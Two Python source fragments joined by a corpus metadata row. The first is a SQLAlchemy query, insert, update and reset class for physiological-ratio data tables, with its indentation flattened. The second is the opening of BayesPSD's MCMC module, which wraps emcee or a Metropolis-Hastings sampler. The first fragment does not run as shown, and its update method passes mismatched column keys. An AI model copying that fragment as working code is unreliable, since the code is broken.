data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_value).all();
ratios_O = [];
for d in data:
ratios_O.append(d[0]);
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameAbbreviationAndTimePointAndRatioID_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_abbreviation_I, time_point_I, physiologicalratio_id_I,exp_type_I=4):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
sample_description.sample_name_abbreviation.like(sample_name_abbreviation_I),
sample_description.time_point.like(time_point_I),
experiment.exp_type_id == exp_type_I,
experiment.id.like(experiment_id_I),
experiment.sample_name.like(sample.sample_name),
sample.sample_id.like(sample_description.sample_id),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_description.sample_name_short),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleNameShortAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self, experiment_id_I, sample_name_short_I, time_point_I):
"""Query rows from data_stage01_physiologicalRatios_replicates"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.sample_name_short.like(sample_name_short_I),
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).all();
rows_O = [];
if data:
for d in data:
rows_O.append({'experiment_id':d.experiment_id,
'sample_name_short':d.sample_name_short,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value':d.physiologicalratio_value,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
# Query ratio_id information from data_stage01_quantificaton_physiologicalRatios_replicates
def get_ratioIDs_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I,time_point_I):
'''Query physiologicalRatio_ids that are used from the experiment by time_point'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
def get_ratioIDs_experimentID_dataStage01PhysiologicalRatiosReplicates(self,experiment_id_I):
'''Query physiologicalRatio_ids that are used from the experiment'''
try:
ratios = self.session.query(data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).filter(
data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_replicates.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_name,
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_description).order_by(
data_stage01_quantification_physiologicalRatios_replicates.physiologicalratio_id.asc()).all();
ratios_O = {};
for r in ratios:
ratios_O[r.physiologicalratio_id] = {'name':r.physiologicalratio_name,
'description':r.physiologicalratio_description};
return ratios_O;
except SQLAlchemyError as e:
print(e);
# Query time points from data_stage01_quantification_physiologicalRatios_averages
def get_timePoint_experimentID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I):
'''Querry time points that are used from the experiment'''
try:
time_points = self.session.query(data_stage01_quantification_physiologicalRatios_averages.time_point).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.time_point).order_by(
data_stage01_quantification_physiologicalRatios_averages.time_point.asc()).all();
time_points_O = [];
for tp in time_points: time_points_O.append(tp.time_point);
return time_points_O;
except SQLAlchemyError as e:
print(e);
# Query sample names from data_stage01_quantification_physiologicalRatios_averages
def get_sampleNameAbbreviations_experimentIDAndTimePoint_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
def get_sampleNameAbbreviations_experimentIDAndTimePointAndRatioID_dataStage01PhysiologicalRatiosAverages(self,experiment_id_I,time_point_I,physiologicalratio_id_I):
'''Querry sample names (i.e. unknowns) that are used from
the experiment'''
try:
sample_names = self.session.query(data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).group_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation).order_by(
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.asc()).all();
sample_names_O = [];
for sn in sample_names: sample_names_O.append(sn.sample_name_abbreviation);
return sample_names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_physiologicalRatios_averages:
def get_data_experimentIDAndTimePointAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = [];
for d in data:
data_1 = {'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'time_point':d.time_point,
'physiologicalratio_id':d.physiologicalratio_id,
'physiologicalratio_name':d.physiologicalratio_name,
'physiologicalratio_value_ave':d.physiologicalratio_value_ave,
'physiologicalratio_value_cv':d.physiologicalratio_value_cv,
'physiologicalratio_value_lb':d.physiologicalratio_value_lb,
'physiologicalratio_value_ub':d.physiologicalratio_value_ub,
'physiologicalratio_description':d.physiologicalratio_description,
'used_':d.used_,
'comment_':d.comment_};
data_O.append(data_1);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_data_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
data_O = {};
if data:
data_O = {'experiment_id':data[0].experiment_id,
'sample_name_abbreviation':data[0].sample_name_abbreviation,
'time_point':data[0].time_point,
'physiologicalratio_id':data[0].physiologicalratio_id,
'physiologicalratio_name':data[0].physiologicalratio_name,
'physiologicalratio_value_ave':data[0].physiologicalratio_value_ave,
'physiologicalratio_value_cv':data[0].physiologicalratio_value_cv,
'physiologicalratio_value_lb':data[0].physiologicalratio_value_lb,
'physiologicalratio_value_ub':data[0].physiologicalratio_value_ub,
'physiologicalratio_description':data[0].physiologicalratio_description,
'used_':data[0].used_,
'comment_':data[0].comment_};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_ratio_experimentIDAndTimePointAndRatioIDAndSampleNameAbbreviation_dataStage01PhysiologicalRatiosAverages(self, experiment_id_I,time_point_I,physiologicalratio_id_I,sample_name_abbreviation_I):
"""get data from experiment ID"""
try:
data = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(
data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I),
data_stage01_quantification_physiologicalRatios_averages.time_point.like(time_point_I),
data_stage01_quantification_physiologicalRatios_averages.physiologicalratio_id.like(physiologicalratio_id_I),
data_stage01_quantification_physiologicalRatios_averages.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_quantification_physiologicalRatios_averages.used_.is_(True)).all();
ratio_O = None;
if data:
ratio_O = data[0].physiologicalratio_value_ave;
return ratio_O;
except SQLAlchemyError as e:
print(e);
def drop_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.drop(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.drop(self.engine,True);
except SQLAlchemyError as e:
print(e);
def initialize_dataStage01_quantification_physiologicalRatios(self):
try:
data_stage01_quantification_physiologicalRatios_replicates.__table__.create(self.engine,True);
data_stage01_quantification_physiologicalRatios_averages.__table__.create(self.engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage01_quantification_physiologicalRatios(self,experiment_id_I):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(data_stage01_quantification_physiologicalRatios_replicates.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_quantification_physiologicalRatios_averages).filter(data_stage01_quantification_physiologicalRatios_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def add_dataStage01QuantificationPhysiologicalRatiosReplicates(self, data_I):
'''add rows of data_stage01_quantification_physiologicalRatios_replicates'''
if data_I:
for d in data_I:
try:
data_add = data_stage01_quantification_physiologicalRatios_replicates(d
#d['experiment_id_I'],
#d['sample_name_short_I'],
##d['sample_name_abbreviation_I'],
#d['time_point_I'],
##d['time_point_units_I'],
#d['physiologicalratio_id_I'],
#d['physiologicalratio_name_I'],
#d['physiologicalratio_value_I'],
#d['physiologicalratio_description_I'],
#d['used__I'],
#d['comment__I']
);
self.session.add(data_add);
except SQLAlchemyError as e:
print(e);
self.session.commit();
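    # Usage sketch (hypothetical values; `io` is an instance of this
    # data-access class, and the row keys mirror the update method below):
    #   io.add_dataStage01QuantificationPhysiologicalRatiosReplicates([
    #       {'experiment_id_I': 'exp01', 'sample_name_short_I': 'sample01',
    #        'time_point_I': '0', 'physiologicalratio_id_I': 'ratio01',
    #        'physiologicalratio_name_I': 'ratio01_name',
    #        'physiologicalratio_value_I': 1.0,
    #        'physiologicalratio_description_I': '', 'used__I': True,
    #        'comment__I': ''}])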
def update_dataStage01QuantificationPhysiologicalRatiosReplicates(self,data_I):
        '''update rows of data_stage01_quantification_physiologicalRatios_replicates'''
if data_I:
for d in data_I:
try:
data_update = self.session.query(data_stage01_quantification_physiologicalRatios_replicates).filter(
data_stage01_quantification_physiologicalRatios_replicates.id==d['id']).update(
{'experiment_id_I':d['experiment_id_I'],
'sample_name_short_I':d['sample_name_short_I'],
#'sample_name_abbreviation_I':d['#sample_name_abbreviation_I'],
'time_point_I':d['time_point_I'],
#'time_point_units_I':d['#time_point_units_I'],
'physiologicalratio_id_I':d['physiologicalratio_id_I'],
'physiologicalratio_name_I':d['physiologicalratio_name_I'],
'physiologicalratio_value_I':d['physiologicalratio_value_I'],
'physiologicalratio_description_I':d['physiologicalratio_description_I'],
'used__I':d['used__I'],
'comment__I':d['comment__I']},
synchronize_session=False);
except SQLAlchemyError as e:
print(e);
            self.session.commit();
| mit | -2,891,780,877,875,105,300 | 71.189252 | 240 | 0.658856 | false | 3.758637 | false | false | false |
dhuppenkothen/BayesPSD | BayesPSD/mcmc.py | 1 | 27460 |
import matplotlib.pyplot as plt
from matplotlib.ticker import MaxNLocator
import numpy as np
import math
import sys
import scipy
import scipy.optimize
from scipy.stats.mstats import mquantiles as quantiles
import scipy.stats
### New: added possibility to use emcee for MCMCs
try:
import emcee
# import acor
emcee_import = True
except ImportError:
print("Emcee and Acor not installed. Using Metropolis-Hastings algorithm for Markov Chain Monte Carlo simulations.")
emcee_import = False
from BayesPSD import utils
from BayesPSD import powerspectrum
### See if cutting-edge numpy is installed so I can use choice
try:
from numpy.random import choice
### if not, use hack
except ImportError:
choice = utils.choice_hack
class MarkovChainMonteCarlo(object):
"""
Markov Chain Monte Carlo for Bayesian QPO searches.
Either wraps around emcee, or uses the
Metropolis-Hastings sampler defined in this file.
Parameters
----------
x : {list, array-like}
        Independent variable, most likely the frequencies of the
periodogram in this context.
y : {list, array-like}
Dependent variable, most likely the powers of the
periodogram in this context.
lpost : Posterior object
An instance of the class Posterior or one of its subclasses;
defines the likelihood and priors to be used.
For periodograms, use
* posterior.PerPosterior for unbinned periodograms
* posterior.StackPerPosterior for binned/stacked periodograms
topt : {list, array-like}
Starting point for generating an initial set of parameter samples.
Should be in a region of high posterior, such that the chains
don't spend a long time exploring regions with low posterior mass.
If possible, make a MAP fit and use the MAP parameters here.
The length of topt needs to match the number of parameters used
in whatever function is stored in lpost.func
tcov: {array-like}
The variances and covarianced between parameters used to generate an
initial set of parameter samples for all chains/walkers.
There are several options here: you can set large variances and no
covariances and effectively leave the Markov chains to explore
the prior mass until they converge. You can also use the inverse
Fisher information (as for example returned by bfgs) as covariance
matrix to make an initial guess. This usually works better in the sense
that it requires fewer steps of the Markov chains.
        tcov needs to have dimensions (k,k), where k is the number of parameters
taken by lpost.func
covfactor : float, optional, default 1.0
A tuning parameter for the MCMC step. Used only in
Metropolis-Hastings.
niter : int, optional, default 5000
Sets the length of the Markov chains.
For Metropolis-Hastings, this needs to be large (>10000)
For emcee, this can be smaller, but it's a good idea to
verify that the chains have mixed.
nchain : int, optional, default 10
The number of chains or walkers to use in MCMC.
For Metropolis-Hastings, use ~10-20 and many samples
For emcee, use as many as you can afford (~500) and fewer samples
discard : {int, None}, optional, default None
The number of initial samples to discard from the Markov chain.
For emcee, the burn-in time is *always* 200 samples (additional to
whatever is set by niter).
For the Metropolis-Hastings algorithm, the number of initial samples
discarded is set by this variable.
If discard is None, then half of the samples are discarded as default.
parname : list, optional, default None
Include a list of strings here to set parameter names for
plotting
check_conv : boolean, optional, default True
If True, check for convergence of the Markov chains using check_convergence
method below.
NOTE: This was set up explicitly for Metropolis-Hastings. For emcee,
this might not necessarily produce easily interpretable results.
namestr : string, optional, default 'test'
a string to use for saving plots and output files
use_emcee : boolean, optional, default True
If True (STRONGLY RECOMMENDED), use the emcee package
for running MCMC. If False, use Metropolis-Hastings.
plot : boolean, optional, default True
If True, then save some useful plots; in particular,
convergence plots as well as a triangle plot showing
the posterior distributions
printobj : object, optional, default None
In theory, this allows the use of an alternative
to the standard print function in order to save
information to file etc.
NOTE: CURRENTLY DOESN'T WORK PROPERLY!
m : int, optional, default 1
If the input periodogram is the result of stacking
several individual periodograms, or the result of
binning adjacent frequencies into a coarser frequency
resolution, then the distribution to be used in the
likelihood function is different!
Set the number of periodograms averaged/stacked here.
"""
def __init__(self, x, y, lpost, topt, tcov,
covfactor=1.0,
niter=5000,
nchain=10,
discard=None,
parname = None,
check_conv = True,
namestr='test',
use_emcee=True,
plot=True,
printobj = None,
m=1):
self.m = m
self.x = x
self.y = y
self.plot = plot
print("<--- self.ps len MCMC: " + str(len(self.x)))
### set of optimal parameters from MLE fitting
self.topt = topt
print("mcobs topt: " + str(self.topt))
### covariances of fitted parameters
self.tcov = tcov*covfactor
print("mcobs tcov: " + str(self.tcov))
### number of iterations for MCMC algorithm
self.niter = niter
### number of MCMC chains to be computed
self.nchain = nchain
### Error in the fitted parameters
self.terr = np.sqrt(np.diag(tcov))
### function that was fitted
self.lpost = lpost
        if discard is None:
discard = math.floor(niter/2.0)
mcall = []
### if emcee package is not installed, enforce Metropolis-Hastings implementation
if emcee_import == False:
print("Emcee not installed. Enforcing M-H algorithm!")
use_emcee = False
### if emcee should be used, then use code below
if use_emcee:
### number of walkers is the number of chains
nwalkers = self.nchain
### number of dimensions for the Gaussian (=number of parameters)
ndim = len(self.topt)
### sample random starting positions for each of the walkers
            p0 = [np.random.multivariate_normal(self.topt, self.tcov) for i in range(nwalkers)]
### initialize sampler
sampler = emcee.EnsembleSampler(nwalkers,ndim, lpost, args=[False])
### run burn-in phase and reset sampler
pos, prob, state = sampler.run_mcmc(p0, 200)
sampler.reset()
### run actual MCMCs
sampler.run_mcmc(pos, niter, rstate0=state)
### list of all samples stored in flatchain
mcall = sampler.flatchain
            ### print mean acceptance rate for all walkers and autocorrelation times
print("The ensemble acceptance rate is: " + str(np.mean(sampler.acceptance_fraction)))
self.L = np.mean(sampler.acceptance_fraction)*len(mcall)
self.acceptance = np.mean(sampler.acceptance_fraction)
try:
self.acor = sampler.acor
print("The autocorrelation times are: " + str(sampler.acor))
except ImportError:
print("You can install acor: http://github.com/dfm/acor")
self.acor = None
except RuntimeError:
print("D was negative. No clue why that's the case! Not computing autocorrelation time ...")
self.acor = None
except:
print("Autocorrelation time calculation failed due to an unknown error: " + str(sys.exc_info()[0]) + ". Not computing autocorrelation time.")
self.acor = None
### if emcee_use == False, then use MH algorithm as defined in MarkovChain object below
else:
### loop over all chains
for i in range(nchain):
#t0 = topt + choice([2.0, 3.0, -3.0, -2.0], size=len(topt))*self.terr
### set up MarkovChain object
mcout = MetropolisHastings(topt, tcov, lpost, niter = niter, parname = parname, discard = discard)
### create actual chain
mcout.create_chain(self.x, self.y)
### make diagnostic plots
mcout.run_diagnostics(namestr = namestr +"_c"+str(i), parname=parname)
mcall.extend(mcout.theta)
self.L = mcout.L
mcall = np.array(mcall)
### check whether chains/walkers converged
if check_conv == True:
self.check_convergence(mcall, namestr, printobj = printobj)
### transpose list of parameter sets so that I have lists with one parameter each
self.mcall = mcall.transpose()
### make inferences from MCMC chain, plot to screen and save plots
self.mcmc_infer(namestr=namestr, printobj = printobj)
def check_convergence(self, mcall, namestr, printobj=None, use_emcee = True):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
### compute Rhat for all parameters
rh = self._rhat(mcall, printobj)
self.rhat = rh
plt.scatter(rh, np.arange(len(rh))+1.0 )
plt.axis([0.1,2,0.5,0.5+len(rh)])
plt.xlabel("$R_hat$")
plt.ylabel("Parameter")
plt.title('Rhat')
plt.savefig(namestr + '_rhat.png', format='png')
plt.close()
### compute 80% quantiles
ci0, ci1 = self._quantiles(mcall)
### set array with colours
### make sure there are enough colours available
colours_basic = ['b', 'g', 'r', 'c', 'm', 'y', 'k']
cneeded = int(math.ceil(len(ci0[0])/7.0))
colours = []
for x in range(cneeded):
colours.extend(colours_basic)
### plot 80% quantiles
if self.plot:
plt.plot(0,0)
plt.axis([-2, 2, 0.5, 0.5+len(ci0)])
for j in range(self.nchain):
plt.hlines(y=[m+(j)/(4.0*self.nchain) for m in range(len(ci0))], xmin=[x[j] for x in ci0], xmax=[x[j] for x in ci1], color=colours[j])
#plt.hlines(y=[m+1.0+(1)/(4*self.nchain) for m in np.arange(len(ci0))], xmin=[x[1] for x in ci0], xmax=[x[1] for x in ci1], color=colours[j])
plt.xlabel("80% region (scaled)")
plt.ylabel("Parameter")
plt.title("80% quantiles")
plt.savefig(namestr + "_quantiles.png", format="png")
plt.close()
### auxiliary function used in check_convergence
### computes R_hat, which compares the variance inside chains to the variances between chains
def _rhat(self, mcall, printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
print("Computing Rhat. The closer to 1, the better!")
rh = []
### loop over parameters ###
for i,k in enumerate(self.topt):
### pick parameter out of array
tpar = np.array([t[i] for t in mcall])
### reshape back into array of niter*nchain dimensions
            tpar = np.reshape(tpar, (self.nchain, len(tpar)//self.nchain))
            ### compute the mean of the within-chain variances
            sj = [np.var(y) for y in tpar]
            W = np.mean(sj)
            ### compute the variance of the means of each chain
            mj = [np.mean(y) for y in tpar]
            ### note: self.L is the per-chain length after burn-in samples are discarded
            B = np.var(mj)*self.L
## now compute marginal posterior variance
mpv = ((float(self.L)-1.0)/float(self.L))*W + B/float(self.L)
### compute Rhat
rh.append(np.sqrt(mpv/W))
### print convergence message on screen:
print("The Rhat value for parameter " + str(i) + " is: " + str(rh[i]) + ".")
if rh[i] > 1.2:
print("*** HIGH Rhat! Check results! ***")
else:
print("Good Rhat. Hoorah!")
return rh
def _quantiles(self, mcall):
### empty lists for quantiles
ci0, ci1 = [], []
### loop over the parameters ###
for i,k in enumerate(self.topt):
print("I am on parameter: " + str(i))
### pick parameter out of array
tpar = np.array([t[i] for t in mcall])
### reshape back into array of niter*nchain dimensions
            tpar = np.reshape(tpar, (self.nchain, len(tpar)//self.nchain))
            ### compute the 10% and 90% quantiles of each chain
            intv = [quantiles(y, prob=[0.1, 0.9]) for y in tpar]
### quantiles will return a list with two elements for each
### chain: the 0.1 and 0.9 quantiles
### need to pick out these for each chain
c0 = np.array([x[0] for x in intv])
c1 = np.array([x[1] for x in intv])
### now compute the scale
scale = np.mean(c1-c0)/2.0
### compute means of each chain
            mt = [np.mean(y) for y in tpar]
### mean of means of all chains
offset = np.mean(mt)
### rescale quantiles (WHY??)
ci0.append((c0 - offset)/scale)
ci1.append((c1 - offset)/scale)
return ci0, ci1
def mcmc_infer(self, namestr='test', printobj = None):
#if printobj:
# print = printobj
#else:
# from __builtin__ import print as print
### covariance of the parameters from simulations
covsim = np.cov(self.mcall)
print("Covariance matrix (after simulations): \n")
print(str(covsim))
### calculate for each parameter its (posterior) mean and equal tail
### 90% (credible) interval from the MCMC
        self.mean = [np.mean(y) for y in self.mcall]
        self.std = [np.std(y) for y in self.mcall]
        self.ci = [quantiles(y, prob=[0.05, 0.95]) for y in self.mcall]
### print to screen
print("-- Posterior Summary of Parameters: \n")
print("parameter \t mean \t\t sd \t\t 5% \t\t 95% \n")
print("---------------------------------------------\n")
for i in range(len(self.topt)):
print("theta[" + str(i) + "] \t " + str(self.mean[i]) + "\t" + str(self.std[i]) + "\t" + str(self.ci[i][0]) + "\t" + str(self.ci[i][1]) + "\n" )
### produce matrix scatter plots
N = len(self.topt) ### number of parameters
print("N: " + str(N))
n, bins, patches = [], [], []
if self.plot:
fig = plt.figure(figsize=(15,15))
plt.subplots_adjust(top=0.925, bottom=0.025, left=0.025, right=0.975, wspace=0.2, hspace=0.2)
for i in range(N):
for j in range(N):
xmin, xmax = self.mcall[j][:1000].min(), self.mcall[j][:1000].max()
ymin, ymax = self.mcall[i][:1000].min(), self.mcall[i][:1000].max()
ax = fig.add_subplot(N,N,i*N+j+1)
ax.xaxis.set_major_locator(MaxNLocator(5))
ax.ticklabel_format(style="sci", scilimits=(-2,2))
if i == j:
#pass
                    ntemp, binstemp, patchestemp = ax.hist(self.mcall[i][:1000], 30, density=True, histtype='stepfilled')
n.append(ntemp)
bins.append(binstemp)
patches.append(patchestemp)
ax.axis([ymin, ymax, 0, max(ntemp)*1.2])
else:
ax.axis([xmin, xmax, ymin, ymax])
### make a scatter plot first
ax.scatter(self.mcall[j][:1000], self.mcall[i][:1000], s=7)
### then add contours
xmin, xmax = self.mcall[j][:1000].min(), self.mcall[j][:1000].max()
ymin, ymax = self.mcall[i][:1000].min(), self.mcall[i][:1000].max()
### Perform Kernel density estimate on data
try:
X,Y = np.mgrid[xmin:xmax:100j, ymin:ymax:100j]
positions = np.vstack([X.ravel(), Y.ravel()])
values = np.vstack([self.mcall[j][:1000], self.mcall[i][:1000]])
kernel = scipy.stats.gaussian_kde(values)
Z = np.reshape(kernel(positions).T, X.shape)
ax.contour(X,Y,Z,7)
except ValueError:
print("Not making contours.")
plt.savefig(namestr + "_scatter.png", format='png')
plt.close()
return
#### POSTERIOR PREDICTIVE CHECKS ################
#
# Note: fpeak is calculated in mle.PerMaxLike.compute_stats
# and can be found in dictionary self.pl_r or self.bpl_r
#
## nsim [int] = number of simulations
## dist [str] = distribution, one of
## "exp": exponential distribution (=chi2_2), np.random.exponential
## "chisquare": chi^2 distribution with df degrees of freedom
## df [int] = degrees of freedom for chi^2 distribution
def simulate_periodogram(self, nsim=5000):
"""
Simulate periodograms from posterior samples of the
broadband noise model.
This method uses the results of an MCMC run to
pick samples from the posterior and use the function
stored in self.lpost.func to create a power spectral form.
In order to transform this into a model periodogram,
it picks for each frequency from an exponential distribution
with a shape parameter corresponding to the model power
at that frequency.
Parameters
----------
nsim : int, optional, default 5000
The number of periodograms to simulate. This number
must be smaller than the number of samples generated
during the MCMC run.
Returns
-------
fps : array-like
An array of shape (nsim, nfrequencies) with all
simulated periodograms.
"""
## the function to use is stored in lpost:
func = self.lpost.func
### number of simulations is either given by the user,
### or defined by the number of MCMCs run!
nsim = min(nsim,len(self.mcall[0]))
### shuffle MCMC parameters
theta = np.transpose(self.mcall)
#print "theta: " + str(len(theta))
np.random.shuffle(theta)
fps = []
percount = 1.0
for x in range(nsim):
### extract parameter set
ain = theta[x]
### compute model 'true' spectrum
mpower = func(self.x, *ain)
### define distribution
if self.m == 1:
#print("m = 1")
noise = np.random.exponential(size=len(self.x))
else:
#print("m = " + str(self.m))
noise = np.random.chisquare(2*self.m, size=len(self.x))/(2.0*self.m)
### add random fluctuations
mpower = mpower*noise
### save generated power spectrum in a PowerSpectrum object
mps = powerspectrum.PowerSpectrum()
mps.freq = self.x
mps.ps = mpower
mps.df = self.x[1] - self.x[0]
mps.n = 2.0*len(self.x)
mps.nphots = mpower[0]
mps.m = self.m
fps.append(mps)
return np.array(fps)
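# Minimal usage sketch (all names below are hypothetical; `lpost` would be a
# posterior.PerPosterior built from a periodogram `ps`, and map_pars/map_cov
# the parameters and covariance of an earlier MAP fit):
#
#   mcobs = MarkovChainMonteCarlo(ps.freq, ps.ps, lpost, map_pars, map_cov,
#                                 niter=200, nchain=500, namestr='example')
#   fake_pers = mcobs.simulate_periodogram(nsim=1000)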
#### MAKE A MARKOV CHAIN OBJECT ###
#
# QUESTION: How can I make an object with variable
# parameters?
#
#
#
# NEED TO THINK ABOUT HOW TO GET ATTRIBUTES!
#
class MetropolisHastings(object):
"""
Parameters
----------
topt : {list, array-like}
Starting point for generating an initial set of parameter samples.
Should be in a region of high posterior, such that the chains
don't spend a long time exploring regions with low posterior mass.
If possible, make a MAP fit and use the MAP parameters here.
The length of topt needs to match the number of parameters used
in whatever function is stored in lpost.func
tcov: {array-like}
        The variances and covariances between parameters used to generate an
initial set of parameter samples for all chains/walkers.
There are several options here: you can set large variances and no
covariances and effectively leave the Markov chains to explore
the prior mass until they converge. You can also use the inverse
Fisher information (as for example returned by bfgs) as covariance
matrix to make an initial guess. This usually works better in the sense
that it requires fewer steps of the Markov chains.
        tcov needs to have dimensions (k,k), where k is the number of parameters
taken by lpost.func
lpost : Posterior object
An instance of the class Posterior or one of its subclasses;
defines the likelihood and priors to be used.
For periodograms, use
* posterior.PerPosterior for unbinned periodograms
* posterior.StackPerPosterior for binned/stacked periodograms
niter : int, optional, default 5000
Sets the length of the Markov chains.
For Metropolis-Hastings, this needs to be large (>10000)
For emcee, this can be smaller, but it's a good idea to
verify that the chains have mixed.
parname : list, optional, default None
Include a list of strings here to set parameter names for
plotting
discard : {int, None}, optional, default None
The number of initial samples to discard from the Markov chain.
For emcee, the burn-in time is *always* 200 samples (additional to
whatever is set by niter).
For the Metropolis-Hastings algorithm, the number of initial samples
discarded is set by this variable.
If discard is None, then half of the samples are discarded as default.
"""
def __init__(self, topt, tcov, lpost, niter = 5000,
parname=None, discard=None):
self.niter = niter
self.topt = topt
self.tcov = tcov
